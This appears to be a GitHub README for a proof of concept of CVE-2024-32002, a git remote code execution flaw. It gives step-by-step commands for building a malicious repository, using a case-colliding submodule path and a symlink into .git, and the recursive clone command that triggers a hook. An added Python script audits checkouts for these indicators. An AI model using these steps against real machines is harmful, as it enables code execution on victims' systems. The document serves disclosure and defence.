JakobTheDev/cve-2024-32002-poc-rce

CVE-2024-32002 RCE POC

A POC for CVE-2024-32002 demonstrating Remote Code Execution (RCE).

See cve-2024-32002-poc-rce for the related submodule repository.

What this repo contains

  • A symlink with an arbitrary name that links to the .git directory.
  • A .gitmodules file that defines the malicious submodule.

How to recreate this repo

This repo was created in Linux (WSL2, to be specific). This is important: the malicious repo can only be created on a case-sensitive filesystem.

  1. Create a symlink, using all lowercase characters
ln -s .git submodule

Notes:

  • The symlink should point to the .git folder, since this is where we want to write files
  • The symlink name (submodule) is arbitrary, but should start with a lowercase character
  • This is important, because lowercase characters sort earlier than uppercase characters. When the cloning machine gets confused about where to write the submodule files, we want it to choose the symlink and not a normal directory.
  2. Add the malicious submodule, noting the case difference on the submodule directory name
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce

Notes:

  • The name of the submodule ("rce/notexists") matters; it will come into play when placing our hook in the submodule.
    • "rce" must match the last segment of the Submodule's path.
    • "notexists" must match the name of the directory containing hooks/post-checkout in the submodule directory. See cve-2024-32002-poc-rce.
  • The structure of the submodule path ("Submodule/modules/rce") also matters:
    • The first segment of the submodule's path ("Submodule") should match the symlink name above, just differing in case.
    • The second segment ("modules") matches the name of the path within the .git directory that tracks git status for submodules.
    • The third segment ("rce") must match the first segment of the submodule name above.
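The layout described in the notes above (a lowercase symlink pointing into .git, plus a .gitmodules entry whose path differs from that symlink only in case) is also what a defender can look for before recursing into a freshly cloned repository. The script below is an added example written for this page, not code from the PoC repository: it parses .gitmodules and scans a non-recursive checkout on a case-sensitive system (for example Linux, where the symlink is materialised as a real link) for both indicators. The function names and the directory built by build_sample_repo() are this example's own constructed sample; nothing is cloned.

```python
#!/usr/bin/env python3
"""Audit a non-recursive checkout for the two artifacts described above:
a symlink that resolves into the .git directory, and a submodule path whose
first component collides (case-insensitively) with that symlink's name.
Added example for this page; the function names and the sample layout built
by build_sample_repo() are this example's own, not the PoC repo's code.
"""
import os
import re
import tempfile
from pathlib import Path

# Matches a git config section header such as: [submodule "rce/notexists"]
SECTION_RE = re.compile(r'^\[submodule\s+"([^"]+)"\]$')


def parse_gitmodules(text: str) -> dict:
    """Parse .gitmodules into {submodule name: {key: value}}.

    Hand-rolled rather than configparser so that git's tab-indented
    'key = value' lines and quoted section names are handled predictably.
    """
    modules, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in '#;':
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            modules.setdefault(current, {})
            continue
        if current is not None and '=' in line:
            key, _, value = line.partition('=')
            modules[current][key.strip()] = value.strip()
    return modules


def symlinks_into_git(repo: Path) -> list:
    """Relative paths of worktree symlinks whose target resolves inside .git."""
    git_dir = (repo / '.git').resolve()
    hits = []
    for p in repo.rglob('*'):
        rel = p.relative_to(repo)
        if rel.parts[0] == '.git' or not p.is_symlink():
            continue
        target = p.resolve()  # follows the link; dangling links resolve too
        if target == git_dir or git_dir in target.parents:
            hits.append(rel.as_posix())
    return sorted(hits)


def submodule_case_collisions(repo: Path, modules: dict) -> list:
    """(submodule name, submodule path, symlink name) for every submodule whose
    path's first component equals a top-level symlink name ignoring case.
    On a case-insensitive filesystem the two names are the same entry."""
    links = {p.name.lower(): p.name for p in repo.iterdir() if p.is_symlink()}
    findings = []
    for name, cfg in modules.items():
        path = cfg.get('path', '')
        first = path.split('/', 1)[0]
        link = links.get(first.lower())
        if link is not None:
            findings.append((name, path, link))
    return findings


def audit_repo(repo: Path) -> dict:
    """Run both checks; an empty list under each key means nothing was found."""
    gm = repo / '.gitmodules'
    modules = parse_gitmodules(gm.read_text()) if gm.exists() else {}
    return {
        'symlinks_into_git': symlinks_into_git(repo),
        'collisions': submodule_case_collisions(repo, modules),
    }


def build_sample_repo(malicious: bool = True) -> Path:
    """Build a throwaway directory mimicking the layout this README describes
    (constructed sample, not a real clone). With malicious=False the symlink
    is a harmless 'documentation' link and the submodule path does not collide."""
    repo = Path(tempfile.mkdtemp(prefix='cve-2024-32002-audit-'))
    (repo / '.git' / 'modules').mkdir(parents=True)
    (repo / 'docs').mkdir()
    if malicious:
        os.symlink('.git', repo / 'submodule')
        path = 'Submodule/modules/rce'
    else:
        os.symlink('docs', repo / 'documentation')
        path = 'vendor/rce'
    (repo / '.gitmodules').write_text(
        '[submodule "rce/notexists"]\n'
        f'\tpath = {path}\n'
        '\turl = https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git\n'
    )
    return repo


if __name__ == '__main__':
    for flag in (True, False):
        label = 'malicious' if flag else 'benign'
        print(label, audit_repo(build_sample_repo(flag)))
```

To use it on a real repository, clone without `--recursive` on a case-sensitive system, point `audit_repo()` at the checkout, and only recurse into submodules once both lists come back empty. Either finding on its own is suspicious: a symlink into .git has no legitimate purpose in a worktree, and a submodule path that aliases a symlink by case is exactly the confusion the notes above rely on.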

How to run the POC

This vulnerability only affects Windows and macOS because both ship with case-insensitive filesystems by default.

  1. Check whether you have a vulnerable version of git. See the GitHub advisory for affected versions.
git --version
  2. Think about whether you knowingly want to run a command that could achieve RCE... This repo is benign, but are you sure?
  3. Run the following command:
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git
  4. If the POC worked, you should be able to do some calculating!